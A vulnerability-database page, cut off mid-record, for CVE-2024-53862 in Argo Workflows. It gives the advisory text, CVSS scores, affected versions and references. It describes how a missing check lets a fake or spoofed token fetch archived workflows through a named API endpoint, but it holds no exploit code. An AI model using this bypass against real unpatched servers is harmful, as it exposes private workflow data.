Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-53862 (GCVE-0-2024-53862)
Vulnerability from cvelistv5 – Published: 2024-12-02 16:08 – Updated: 2024-12-02 19:41
VLAI?
EPSS
Title
Argo Workflows Allows Access to Archived Workflows with Fake Token in `client` mode
Summary
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication & authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint's fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.
Severity ?
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/argoproj/argo-workflows/securi… | x_refsource_CONFIRM |
| https://github.com/argoproj/argo-workflows/pull/1… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| argoproj | argo-workflows |
Affected:
>= 3.5.7, < 3.5.13
Affected: >= 3.6.0-rc1, < 3.6.2 |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:argoproj:argo-workflows:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "argo-workflows",
"vendor": "argoproj",
"versions": [
{
"lessThanOrEqual": "3.5.7",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "3.5.13",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "3.6.0-rc1",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "3.6.2",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-53862",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-12-02T19:34:48.219260Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-12-02T19:41:07.391Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "argo-workflows",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.5.7, \u003c 3.5.13"
},
{
"status": "affected",
"version": "\u003e= 3.6.0-rc1, \u003c 3.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290: Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-12-02T16:08:17.618Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
},
{
"name": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
}
],
"source": {
"advisory": "GHSA-h36c-m3rf-34h9",
"discovery": "UNKNOWN"
},
"title": "Argo Workflows Allows Access to Archived Workflows with Fake Token in `client` mode"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-53862",
"datePublished": "2024-12-02T16:08:17.618Z",
"dateReserved": "2024-11-22T17:30:02.144Z",
"dateUpdated": "2024-12-02T19:41:07.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-53862",
"date": "2026-05-21",
"epss": "0.00321",
"percentile": "0.55249"
},
"fkie_nvd": {
"descriptions": "[{\"lang\": \"en\", \"value\": \"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.\"}, {\"lang\": \"es\", \"value\": \"Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\\u00e1lido a trav\\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\\u00f3n en los tokens `client`. En cambio, la autenticaci\\u00f3n y la autorizaci\\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\\u00faa con k8s, por lo que cualquier token que parezca v\\u00e1lido se considerar\\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\\u00e9s, el Archivo de flujo de trabajo realiza espec\\u00edficamente el equivalente de una verificaci\\u00f3n `kubectl auth can-i` para los m\\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\\u00f3n de autenticaci\\u00f3n se elimin\\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\\u00edneas, lo que permiti\\u00f3 recuperar flujos de trabajo archivados con un token falso. Esta vulnerabilidad se corrigi\\u00f3 en 3.6.2 y 3.5.13.\"}]",
"id": "CVE-2024-53862",
"lastModified": "2024-12-02T16:15:14.277",
"metrics": "{\"cvssMetricV40\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"4.0\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\", \"baseScore\": 6.3, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"vulnerableSystemConfidentiality\": \"LOW\", \"vulnerableSystemIntegrity\": \"NONE\", \"vulnerableSystemAvailability\": \"NONE\", \"subsequentSystemConfidentiality\": \"LOW\", \"subsequentSystemIntegrity\": \"NONE\", \"subsequentSystemAvailability\": \"NONE\", \"exploitMaturity\": \"NOT_DEFINED\", \"confidentialityRequirements\": \"NOT_DEFINED\", \"integrityRequirements\": \"NOT_DEFINED\", \"availabilityRequirements\": \"NOT_DEFINED\", \"modifiedAttackVector\": \"NOT_DEFINED\", \"modifiedAttackComplexity\": \"NOT_DEFINED\", \"modifiedAttackRequirements\": \"NOT_DEFINED\", \"modifiedPrivilegesRequired\": \"NOT_DEFINED\", \"modifiedUserInteraction\": \"NOT_DEFINED\", \"modifiedVulnerableSystemConfidentiality\": \"NOT_DEFINED\", \"modifiedVulnerableSystemIntegrity\": \"NOT_DEFINED\", \"modifiedVulnerableSystemAvailability\": \"NOT_DEFINED\", \"modifiedSubsequentSystemConfidentiality\": \"NOT_DEFINED\", \"modifiedSubsequentSystemIntegrity\": \"NOT_DEFINED\", \"modifiedSubsequentSystemAvailability\": \"NOT_DEFINED\", \"safety\": \"NOT_DEFINED\", \"automatable\": \"NOT_DEFINED\", \"recovery\": \"NOT_DEFINED\", \"valueDensity\": \"NOT_DEFINED\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\"}}]}",
"published": "2024-12-02T16:15:14.277",
"references": "[{\"url\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"source\": \"security-advisories@github.com\"}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-200\"}, {\"lang\": \"en\", \"value\": \"CWE-290\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-53862\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-12-02T16:15:14.277\",\"lastModified\":\"2026-02-06T20:49:29.827\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.\"},{\"lang\":\"es\",\"value\":\"Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\u00e1lido a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\u00f3n en los tokens `client`. En cambio, la autenticaci\u00f3n y la autorizaci\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\u00faa con k8s, por lo que cualquier token que parezca v\u00e1lido se considerar\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\u00e9s, el Archivo de flujo de trabajo realiza espec\u00edficamente el equivalente de una verificaci\u00f3n `kubectl auth can-i` para los m\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\u00f3n de autenticaci\u00f3n se elimin\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\u00edneas, lo que permiti\u00f3 recuperar flujos de trabajo archivados con un token falso. Esta vulnerabilidad se corrigi\u00f3 en 3.6.2 y 3.5.13.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-290\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-290\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"3.5.7\",\"versionEndExcluding\":\"3.5.13\",\"matchCriteriaId\":\"9231D0D8-9FB4-41F3-B41F-F98D22C3C348\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"3.6.0\",\"versionEndExcluding\":\"3.6.2\",\"matchCriteriaId\":\"00514674-61E7-4FF9-874E-C5A2A87A692C\"}]}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-53862\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-12-02T19:34:48.219260Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:argoproj:argo-workflows:*:*:*:*:*:*:*:*\"], \"vendor\": \"argoproj\", \"product\": \"argo-workflows\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"3.5.7\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"3.5.13\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"3.6.0-rc1\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"3.6.2\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-12-02T19:40:13.006Z\"}}], \"cna\": {\"title\": \"Argo Workflows Allows Access to Archived Workflows with Fake Token in `client` mode\", \"source\": {\"advisory\": \"GHSA-h36c-m3rf-34h9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-workflows\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.5.7, \u003c 3.5.13\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.6.0-rc1, \u003c 3.6.2\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"name\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"name\": \"https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-290\", \"description\": \"CWE-290: Authentication Bypass by Spoofing\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-12-02T16:08:17.618Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-53862\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-12-02T19:41:07.391Z\", \"dateReserved\": \"2024-11-22T17:30:02.144Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-12-02T16:08:17.618Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2024-53862
Vulnerability from fkie_nvd - Published: 2024-12-02 16:15 - Updated: 2026-02-06 20:49
Severity ?
Summary
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication & authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint's fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| argoproj | argo_workflows | * | |
| argoproj | argo_workflows | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*",
"matchCriteriaId": "9231D0D8-9FB4-41F3-B41F-F98D22C3C348",
"versionEndExcluding": "3.5.13",
"versionStartIncluding": "3.5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*",
"matchCriteriaId": "00514674-61E7-4FF9-874E-C5A2A87A692C",
"versionEndExcluding": "3.6.2",
"versionStartIncluding": "3.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. When using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}` or when using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`. No authentication is performed by the Server itself on `client` tokens. Authentication \u0026 authorization is instead delegated to the k8s API server. However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a `kubectl auth can-i` check for respective methods. In 3.5.7 and 3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token. This vulnerability is fixed in 3.6.2 and 3.5.13."
},
{
"lang": "es",
"value": "Argo Workflows es un motor de flujo de trabajo nativo de contenedores de c\u00f3digo abierto para orquestar trabajos paralelos en Kubernetes. Cuando se usa `--auth-mode=client`, los flujos de trabajo archivados se pueden recuperar con un token falso o falsificado a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}` o cuando se usa `--auth-mode=sso`, todos los flujos de trabajo archivados se pueden recuperar con un token v\u00e1lido a trav\u00e9s del endpoint de flujo de trabajo GET: `/api/v1/workflows/{namespace}/{name}`. El servidor no realiza ninguna autenticaci\u00f3n en los tokens `client`. En cambio, la autenticaci\u00f3n y la autorizaci\u00f3n se delegan al servidor de API de k8s. Sin embargo, el archivo de flujo de trabajo no interact\u00faa con k8s, por lo que cualquier token que parezca v\u00e1lido se considerar\u00e1 autenticado, incluso si no es un token de k8s o incluso si el token no tiene RBAC para Argo. Para manejar la falta de authN/authZ de k8s de paso a trav\u00e9s, el Archivo de flujo de trabajo realiza espec\u00edficamente el equivalente de una verificaci\u00f3n `kubectl auth can-i` para los m\u00e9todos respectivos. En 3.5.7 y 3.5.8, la verificaci\u00f3n de autenticaci\u00f3n se elimin\u00f3 accidentalmente en el endpoint de flujo de trabajo GET de respaldo a flujos de trabajo archivados en estas l\u00edneas, lo que permiti\u00f3 recuperar flujos de trabajo archivados con un token falso. Esta vulnerabilidad se corrigi\u00f3 en 3.6.2 y 3.5.13."
}
],
"id": "CVE-2024-53862",
"lastModified": "2026-02-06T20:49:29.827",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
